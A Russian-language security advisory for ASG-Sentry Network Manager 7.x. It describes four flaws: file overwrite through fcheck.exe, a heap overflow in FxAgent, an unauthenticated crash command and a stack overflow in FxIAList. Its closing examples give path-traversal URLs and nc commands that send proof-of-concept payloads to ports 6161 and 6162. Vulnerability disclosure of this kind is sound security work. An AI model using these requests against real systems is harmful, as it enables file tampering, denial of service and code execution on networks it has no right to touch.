Программа: ASG-Sentry Network Manager 7.x
Найденные уязвимости позволяют удаленному злоумышленнику осуществить DoS
атаку, получить доступ к файловой системе и выполнить произвольный код на
целевой системе.
1) Уязвимость возникает из-за ошибки в утилите "fcheck.exe". Атакующий может
передать специально сформированные данные, содержащие опцию "-b" в HTTP запросе,
что позволит перезаписать произвольные файлы на целевой системе.
2) Уязвимость возникает из-за ошибки в проецессе "FxAgent". Атакующий может
передать специально сформированный SNMP запрос, содержащий слишком длинную
строку community, что приведет к переполнению динамической памяти.
3) Уязвимость возникает из-за того, что команды передаваемые сервису "FxIAList"
не проходят аутентификацию. Атакующий может передать специально сформированную
команду "exit" на порт 6162/TCP, что приведет к краху сервиса.
4) Уязвимость возникает из-за ошибки в сервисе "FxIAList". Атакующий может
передать специально сформированный пакет на порт 6162/TCP, что приведет к
переполнению стека в выполнению произвольного кода.
Примеры:
http://aluigi.org/poc/asgulo.zip
1)
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\windows\win.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\file.txt+c:\
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+\host\document.txt
this link for the network share is correct because Apache converts
any backslash to double so that one becomes \\host\\document.txt
2)
nc SERVER 6161 -v -v -u < asgulo_fxagent.txt
3)
nc SERVER 6162 -v -v -w 1 < asgulo-ialist1.txt
4)
nc SERVER 6162 -v -v -w 1 < asgulo-ialist2.txt